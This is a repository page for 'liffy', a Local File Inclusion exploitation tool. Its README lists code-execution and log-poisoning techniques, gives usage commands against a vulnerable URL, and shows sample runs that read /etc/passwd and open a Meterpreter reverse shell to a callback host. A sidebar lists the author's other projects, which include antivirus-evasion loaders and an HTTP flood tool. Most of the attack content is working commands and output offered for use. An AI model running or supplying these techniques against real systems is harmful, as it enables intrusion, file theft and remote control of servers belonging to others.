hvqzao/liffy hvqzao/liffy

  • Stars
    star
    123
  • Rank 283,864 (Top 6 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created over 8 years ago
  • Updated over 7 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
hvqzao/liffy
github

hvqzao

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Local File Inclusion Exploitation Tool (mirror)

Liffy

Liffy is a Local File Inclusion Exploitation tool.

Current features include:

  • data:// for code execution
  • expect:// for code execution
  • input:// for code execution
  • filter:// for arbitrary file reads
  • /proc/self/environ for code execution in CGI mode
  • Apache access.log poisoning
  • Linux auth.log SSH poisoning
  • Direct payload delivery with no stager
  • Support for absolute and relative paths
  • Support for cookies

! I have had issues with access log poisoning on current versions of Apache. This not an issue with the payload delivery and or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh. !

Install

Liffy requires the following libraries: requests, argparse, blessings, urlparse, daemon

Update - Liffy now has built-in web serving functionality for all techniques that use the staged approach. This is built upon Python's simpleHTTPServer module, and is being daemonized once spawned as a process within core.py. I have had some issues with socket reuse and the child process not being killed correctly, so QA would be appreciated, and or suggestions on how to design it better.

Example Usage

./liffy --url http://target/pdfs/vulnerable.php?= --data
./liffy --url http://target/pdfs/vulnerable.php?= --data --nostager



ruckus:liffy rotlogix$ python liffy.py --url http://10.0.0.11/vuln/lfi.php?file= --filter


    .____    .__  _____  _____
    |    |   |__|/ ____\/ ____\__.__.
    |    |   |  \   __\   __<   |  |
    |    |___|  ||  |   |  |  \___  |
    |_______ \__||__|   |__|  / ____| v1.2
        \/                \/


[2014-08-03 19:36:33.002626] Checking Target: http://10.0.0.11/vuln/lfi.php?file=
[2014-08-03 19:36:33.002722] ......................................................................
[2014-08-03 19:36:33.791168] Target URL Looks Good!
[2014-08-03 19:36:33.791210] Filter Technique Selected!
[2014-08-03 19:36:33.791336] Please Enter File To Read: /etc/passwd
[2014-08-03 19:36:38.319685] Decoded: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-
data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-
Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false mysql:x:102:105:MySQL
Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin



    .____    .__  _____  _____
    |    |   |__|/ ____\/ ____\__.__.
    |    |   |  \   __\   __<   |  |
    |    |___|  ||  |   |  |  \___  |
    |_______ \__||__|   |__|  / ____| v1.2
        \/                \/


[2014-08-03 19:39:33.674202] Checking Target: http://10.0.0.11/vuln/lfi.php?file=
[2014-08-03 19:39:33.674297] ......................................................................
[2014-08-03 19:39:34.454758] Target URL Looks Good!
[2014-08-03 19:39:34.454795] Data Technique Selected!
[2014-08-03 19:39:34.454877] Please Enter Host For Callbacks: 10.0.0.4
[2014-08-03 19:39:37.112427] Please Enter Port For Callbacks: 6666
[2014-08-03 19:39:38.597878] Generating Wrapper
[2014-08-03 19:39:38.597955] ......................................................................
[2014-08-03 19:39:39.347935] Success!
[2014-08-03 19:39:39.348007] Generating Metasploit Payload
[2014-08-03 19:39:39.348059] ......................................................................
[2014-08-03 19:39:46.289658] Generated Metasploit Resource File
[2014-08-03 19:39:46.289704] Load Metasploit: msfconsole -r php_listener.rc
[2014-08-03 19:39:46.289734] Starting Web Server ...
[2014-08-03 19:39:46.289750] ......................................................................
[2014-08-03 19:39:47.049321] Press Enter To Continue When Your Metasploit Handler is Running ...


[*] Processing php_listener.rc for ERB directives.
resource (php_listener.rc)> use multi/handler
resource (php_listener.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (php_listener.rc)> set LHOST 10.0.0.4
LHOST => 10.0.0.4
resource (php_listener.rc)> set LPORT 6666
LPORT => 6666
resource (php_listener.rc)> set ExitOnSession false
ExitOnSession => false
resource (php_listener.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.4:6666
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (40551 bytes) to 10.0.0.11
[*] Meterpreter session 1 opened (10.0.0.4:6666 -> 10.0.0.11:52410) at 2014-08-03 19:40:39 -0700
msf exploit(handler) >

Sidenote

Original release repository https://github.com/rotlogix/liffy is no longer available.

More Repositories

1

foolav

Pentest tool for antivirus evasion and running arbitrary payload on target Wintel host
C
175
star
2

burp-wildcard

Burp extension intended to compact Burp extension tabs by hijacking them to own tab.
Java
127
star
3

foolavc

foolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV
C
110
star
4

report-ng

Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
Python
65
star
5

burp-flow

Extension providing view with filtering capabilities for both complete and incomplete requests from all burp tools.
Java
46
star
6

java-deserialize-webapp

Vulnerable webapp testbed
Java
19
star
7

burp-token-rewrite

Burp extension for automated handling of CSRF tokens
Java
16
star
8

x

Pentest environment scaffolding. Supporting role in Kali Linux.
Java
12
star
9

ipport

Small subset of Bash and Python scripts which could be used for rapid network recon
Python
11
star
10

burp-second-order

Extension for semi-automated search for second order issues in webapps
Java
8
star
11

jgantt

jGantt plugin for Atlassian JIRA Kanban board
JavaScript
7
star
12

evadeav

AV evasion experiment (fail inspired by some blogpost)
C
6
star
13

sqli-testbed

SQL injection testbed designed for sqlmap practice (MySQL backend)
PHP
3
star
14

burp-negotiate

Kerberos / SPNEGO authentication for BurpSuite
Java
3
star
15

burp-csrf-handling

CSRF tokens handling Burp extension
Python
3
star
16

java-rmi

Example Java RMI client-server both with and without SSL support
Java
2
star
17

ve

Created to provide fast provisioning - automated download, build and set up Python or Node.JS virtual environments.
Shell
2
star
18

http-flood-netty

Trival HTTP Flood implementation based on Java Netty Framework
Java
1
star
19

ftcliserv

File Transfer Client-Server
Python
1
star
20

endec

Tiny utility to encrypt and decrypt text data using aes-256-cbc algorithm.
Python
1
star